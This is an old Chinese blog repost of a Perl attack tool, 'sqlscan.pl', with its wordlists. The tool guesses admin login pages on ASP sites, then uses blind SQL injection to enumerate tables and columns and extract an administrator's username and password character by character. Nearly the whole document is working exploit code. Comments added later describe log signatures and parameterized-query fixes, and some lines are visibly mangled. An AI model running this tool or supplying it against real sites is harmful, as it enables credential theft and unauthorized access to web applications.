ascc+asp自动注射代码,可以猜后台

原创 2004年08月31日 15:21:00
sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<cnhacker521@hotmail.com>2004/1/21.
#Thx MIX

# Start-up section: unbuffered output, banner, target parameters and the three
# wordlists that the later loops iterate over.
$|=1;
use IO::Socket;

print "=======================================================================/n";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> /n";
print " Our Team : www.cnse8.com /n";
print " My Home : xyhack.91i.net /n";
print "=======================================================================/n";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 /n";
print "-----------------------------------------------------------------------/n";

# Target parameters are taken from the command line: host, port, the URL path
# including its query string ($way), and $judge, which the later grep calls
# interpolate into a regex and match against response lines.
if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}

# The wordlists are read whole from the current working directory: candidate
# table names (@Form), candidate column names (@lines) and candidate login
# page paths (@login). Entries keep their trailing newline until the loops
# below chomp them.
# NOTE(review): the first die message names "splfrom.txt" while the file
# opened is 'sqlfrom.txt'.
open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);

# Phase 1: request every candidate path from login.txt (via str1) and report
# the ones whose response contains a line with "200" as its second
# space-separated field.
# Defender note: on the server this appears as a burst of requests for
# admin/login page names from one client, most of them answered with 404.
# Alerting on that pattern, and not exposing the admin interface to untrusted
# networks, addresses this phase.
foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
# Every response line is split on spaces, so header and body lines are tested
# as well as the status line.
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log/n";
}
}
}
# Phase 2: for each candidate table name, str() appends an
# "and exists(select * from <table>)" condition to the target URL; a table is
# reported when some response line matches $judge. For a reported table the
# same request is repeated with each candidate column name in place of "*".
# Defender note: these requests can only change the page's output if the
# application concatenates the query-string value into its SQL text, so
# parameterized queries (or strict numeric validation of the parameter) are
# the fix. The substring "and%20exists(select%20" is present in every request
# this loop sends and is usable as a log or WAF signature.
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/nKaKa !! Find the sqlfrom is /U/a/a$sqlfrom/E: /n";
foreach $line1 (@lines){
chomp $line1;
# str() reads the global $line, so it is set before each call.
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/a$line1/n";
}
}
}
}

# Interactive phase: the operator types the table name and the names of the
# id, username and password columns, read from STDIN.
print "/a/a/nInput the SQLForm of admin !/n$SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print "/n/nNow , Start to Crack ! Please wait....../n/n";

# Each stage below assigns the globals $path1/$path2 (and $path3), which
# crackint() and crackchar() read to build the condition appended to $way.
# Defender note: every stage relies on the page answering differently for a
# true and a false condition. Whatever the column stores is what gets
# disclosed, so salted password hashes instead of plaintext, a database
# account limited to the tables the page needs, and parameterized queries in
# the page itself all reduce or remove the exposure.

# Stage 1: find an integer 1..100 that exists as a value of the id column.
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print "/n/nSuccessful,The id of the first admin's id is /a$id ./n/n";

# Stage 2: find the length (1..100) of the password column for that id.
# crackchar() reads the global $len set here.
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's password is /a$len ./n/n";

# Stage 3: compare growing prefixes of the password column, left(col, n),
# against candidate strings.
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print "/n/nSuccessful,The admin's password is /a/a@password ./n/n";

# Stages 4 and 5: the same length and prefix steps for the username column.
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's name is $len ./n/n";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print "/n/nSuccessful,The admin's username is /a/a@username ./n/n";

print "KaKa !! /a/a/you can use /nusername: @username/npassword: @password/nto login test !/r/n";


# crackint: linear search over the integers 1..100.
# Reads the globals $path1, $path2, $way, $host and $judge. For each candidate
# n it requests $way followed by $path1 . n . $path2 and returns the first n
# for which some response line matches $judge. There is no explicit return
# value when no candidate matches.
# Defender note: the traffic is up to 100 GET requests from one client, paced
# one per second by sleep(1), identical except for a consecutive integer in
# the injected condition. Rate-based detections need a window long enough to
# catch that pacing; matching the repeated condition in the query string is
# more reliable.
sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
# The Referer header is set to the target's own URL.
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host: $host/n/n";
# Progress output: the candidate being tried.
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
# Not reached: the return above already leaves the sub.
last;
}
}
}


# crackchar: recovers a string value one character position at a time.
# Reads the globals $len (set by the caller from crackint), $path1, $path2,
# $path3, $way, $host and $judge. For position j it requests a condition built
# as $path1 . j . $path2 . (confirmed prefix + candidate) . $path3 and keeps
# the first candidate for which some response line matches $judge.
# Returns the accumulated string $pws.
# Defender note: this produces long runs of near-identical GET requests (up
# to one per dictionary entry per position, one per second) that differ only
# in a quoted literal inside the query string. Such runs stand out in web
# server logs; the underlying fix is a parameterized query in the page.
sub crackchar {
my $pws;
# Candidate set: digits, lower- and upper-case letters, ASCII punctuation
# (some entries percent-encoded) and a list of full-width punctuation.
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * /( /) _ %2b = - { } [ ] : " ; < > ? | , . / /);
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
# $key is the prefix confirmed so far plus the candidate under test.
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;

$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host:$host/n/n";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
# Ordinal label used only in the progress message.
$th=$j.th;
print "/nSuccessful,The $th word of the char is $dic[$i] /n";
$pws=$pws.$dic[$i];
# Position j is settled; continue with the next position.
last;
}
}
}

# Post-processing of the result; these three statements appear to relate to
# the percent-encoded dictionary entries (%2b, %25, %26) - TODO confirm
# against an intact copy of the script.
$pws=~s//%2b//+/ig;
$pws=~s//%25//%/ig;
$pws=~s//%26//&/ig;
return $pws;
}

# str: builds and sends one existence probe.
# Reads the globals $line (a column name or "*"), $sqlfrom (a table name),
# $way and $host. The condition "and exists(select <line> from <sqlfrom>)" is
# appended to $way in a GET request carrying Host, Referer and an empty Cookie
# header. The value of the final sock() call, the response lines, is what the
# sub yields to its caller.
# Defender note: the fixed text "%20and%20exists(select%20" reaches the server
# unchanged in the request line, so it can be matched in access logs.
sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

# str1: requests one candidate login page under the target's directory.
# Reads the globals $way, $log, $host and $i; sets the global $way1.
# $way1 is $way with a number of trailing characters removed, that number
# being the length of the element of the split result indexed by $i-1.
# The request for $way1 . $log is sent through sock(), whose result (the
# response lines) is what the sub yields to its caller.
sub str1{
@s=split(////,$way);
# $s holds the element count; the element read on the next line is indexed
# by the global $i.
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

# sock: sends one raw request and returns the response.
# Parameter: $req - the complete request text to write to the socket.
# Opens a TCP connection to the globals $host and $port, writes $req, reads
# the response line by line until the peer closes the connection, and returns
# those lines as a list. Dies if the connection cannot be established.
# A new connection is made for every request, so each probe appears as a
# separate connection in the server's logs.
sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host /n";

print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
# usage: interactive fallback for the target parameters.
# Prompts on STDOUT and reads one line each from STDIN into the globals $host,
# $port, $way and $judge, removing the trailing newline from each.
sub usage {
print "/nInput the Host Info !/n$Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "/Input the Judge Words !/n$Judge=";$judge=<STDIN>;chomp $judge;
}


=================== end =============================
sqlfrom.txt:

admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员

lines.txt:

id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码

login.txt:

pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp
